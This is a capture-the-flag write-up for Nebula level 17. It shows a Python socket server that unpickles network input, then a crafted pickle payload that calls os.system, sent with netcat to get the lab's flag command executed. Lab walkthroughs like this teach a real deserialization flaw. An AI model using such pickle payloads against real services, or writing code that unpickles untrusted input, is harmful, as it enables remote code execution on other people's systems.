Level17 dictates, “There is a python script listening on port 10007 that contains a vulnerability.”
Python! Nice. The nebula war game is using a variety of languages, which is fantastic. We are provided with the following source code:
#!/usr/bin/python
import os
import pickle
import time
import socket
import signal
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
def server(skt):
line = skt.recv(1024)
obj = pickle.loads(line)
for i in obj:
clnt.send("why did you send me " + i + "?\n")
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.bind(('0.0.0.0', 10007))
skt.listen(10)
while True:
clnt, addr = skt.accept()
if(os.fork() == 0):
clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))
server(clnt)
exit(1)
I won’t spoil it, but I learned about pickle over at pythonchallenge.com. Do some additional research if you are not familiar with it.
The majority of the information on pickle will present you with this warning:
Warning The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Never trust the user :)
Let’s craft some malicious data:
level17@nebula:~$ cat foo
cos
system
(S'getflag > /home/flag17/output'
tR.
This data, when deserialized, instructs the system to run ‘getflag > /home/flag17/output’. Let’s direct it at the listener using netcat.
level17@nebula:~$ nc localhost 10007 < foo
Accepted connection from 127.0.0.1:44614^C
level17@nebula:~$ cat /home/flag17/output
You have successfully executed getflag on a target account
Woo, on to the next level!